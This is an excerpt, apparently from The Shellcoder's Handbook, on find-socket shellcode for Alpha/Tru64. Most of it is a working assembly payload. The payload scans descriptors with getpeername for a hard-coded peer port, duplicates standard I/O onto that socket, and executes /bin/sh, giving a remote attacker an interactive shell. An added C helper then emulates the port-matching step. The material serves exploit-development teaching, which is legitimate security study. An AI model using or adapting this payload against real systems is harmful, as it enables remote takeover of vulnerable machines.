Find-Socket Shellcode


Additionally, we can use the same methods to create find-socket shellcode. The following shellcode reuses the TCP connection already established with the remote process, duplicates the standard I/O descriptors onto that socket and executes the shell interpreter, giving the attacker an interactive telnet-like session. It locates the right socket by walking the descriptor numbers downward from 0xff, calling getpeername() on each one and stopping at the first descriptor whose peer source port matches the hard-coded value.

    #include <alpha/regdef.h>
    #include <alpha/pal.h>

            .text
            .arch    generic
            .align   4
            .globl   main
            .ent     main
    main:
            .frame   $sp, 0, $26     # return register operand was lost in the source; $26 (ra) is the conventional value
                                     # xorloop will give us the pc in a0
            bic   sp, 0xf, sp        # make sure the stack is 16 byte aligned.
            addq  a0, 0xa0, s4       # address of //bin/sh
            stq   s4, (sp)           # store address of //bin/sh
            stq   zero, 8(sp)        # argv[1] = NULL
            mov   0x10, t0
            stq   t0, 16(sp)         # sizeof(struct sockaddr_in)
            lda   s2, 16(sp)         # address of sizeof(struct sockaddr_in)
            lda   s1, 24(sp)         # address of sockaddr_in
            bis   zero, zero, s0
            lda   s0, 0xff(zero)     # set counter for the getpeername loop.
            bis   zero, zero, s3     # zero out s3
            mov   0x3412, s3         # src port of peer (network byte order, so port 0x1234)
            sll   s3, 0x30, s3
            srl   s3, 0x30, s3       # mask s3 down to 16 bits

    getpeerloop:
            mov   s0, a0             # socket number.
            mov   s1, a1             # address of sockaddr_in
            mov   s2, a2             # address of sizeof(struct sockaddr_in)
            addq  zero, 0x8d, v0     # getpeername syscall.
            PAL_callsys
            bne   v0, again          # not a connected socket: try the next descriptor
            ldl   t0, 24(sp)         # sin_len | sin_family<<8 | sin_port<<16
            sll   t0, 0x20, t0
            srl   t0, 0x30, t0       # isolate the 16-bit sin_port
            subq  t0, s3, t0
            beq   t0, out            # check if we have a matching source port.
    again:
            subq  s0, 0x1, s0
            bge   s0, getpeerloop
    out:
            mov   0x2, s2
    duploop:
            mov   s0, a0             # socket number
            mov   s2, a1             # stdin, stdout, stderr
            addq  zero, 0x5a, v0     # dup2 syscall
            PAL_callsys
            subq  s2, 0x1, s2        # decrement the counter.
            bge   s2, duploop        # loop for 2,1,0 (stderr, stdout, stdin)

            mov   s4, a0             # address of //bin/sh
            mov   sp, a1             # address of (address of //bin/sh)
            bis   zero, zero, a2     # NULL
            addq  zero, 0x3b, v0     # execve syscall
            PAL_callsys

            .long   0x00000000
            .quad   0x68732f6e69622f2f   # "//bin/sh" (little-endian)
            .long   0x00000000           # NUL terminator
            .end    main
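The least obvious part of the loop above is how the hard-coded constant 0x3412 relates to the peer port reported by getpeername(). As an added example (not code from the book), the following C reproduces the ldl/sll/srl arithmetic of getpeerloop against a constructed BSD-style sockaddr_in prefix, so an analyst can confirm which peer port a given constant selects; the function names and the sample bytes are my own.

```c
#include <stdint.h>

/* Emulates the three instructions the shellcode runs on the sockaddr_in that
 * getpeername() filled in: ldl t0,24(sp); sll t0,0x20,t0; srl t0,0x30,t0.
 * The Tru64 sockaddr_in starts with sin_len, sin_family and then sin_port in
 * network byte order, and Alpha is little-endian, so the 32-bit load yields
 * sin_len | sin_family<<8 | sin_port_bytes<<16. */
static uint64_t shellcode_port_word(const uint8_t sa[4])
{
    uint32_t le32 = (uint32_t)sa[0] | ((uint32_t)sa[1] << 8)
                  | ((uint32_t)sa[2] << 16) | ((uint32_t)sa[3] << 24);
    /* ldl sign-extends bit 31 into the upper half of the 64-bit register. */
    int64_t signed32 = (le32 & 0x80000000u) ? (int64_t)le32 - 0x100000000LL
                                            : (int64_t)le32;
    uint64_t t0 = (uint64_t)signed32;
    t0 <<= 0x20;   /* sll: discards the sign extension and everything above bit 31 */
    t0 >>= 0x30;   /* srl: keeps only the two sin_port bytes */
    return t0;
}

/* Value the shellcode places in s3 ("mov 0x3412, s3") and compares against. */
#define SHELLCODE_PORT_WORD 0x3412u

/* Constructed sample input: first four bytes of a BSD-style sockaddr_in
 * describing a peer whose port is host_port. */
static void make_sockaddr_prefix(uint8_t out[4], uint16_t host_port)
{
    out[0] = 16;                          /* sin_len = sizeof(struct sockaddr_in) */
    out[1] = 2;                           /* sin_family = AF_INET */
    out[2] = (uint8_t)(host_port >> 8);   /* sin_port, network (big-endian) order */
    out[3] = (uint8_t)(host_port & 0xff);
}

/* What the shellcode's comparison sees for a connection from host_port. */
uint64_t port_word_for_peer_port(uint16_t host_port)
{
    uint8_t sa[4];
    make_sockaddr_prefix(sa, host_port);
    return shellcode_port_word(sa);
}

/* 1 if the loop would stop at a socket connected from this peer port. */
int shellcode_selects_port(uint16_t host_port)
{
    return port_word_for_peer_port(host_port) == SHELLCODE_PORT_WORD;
}

/* Translate the constant back to the host-order port seen in netstat output:
 * the low byte of the word is the first (high) byte of the network-order port. */
unsigned shellcode_constant_to_port(uint64_t word)
{
    return (unsigned)(((word & 0xff) << 8) | ((word >> 8) & 0xff));
}
```

So 0x3412 selects a peer connecting from source port 4660 (0x1234); a port whose low byte has the top bit set (for example 128) exercises the sign extension that the sll/srl pair discards.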


The Shellcoder's Handbook. Discovering and Exploiting Security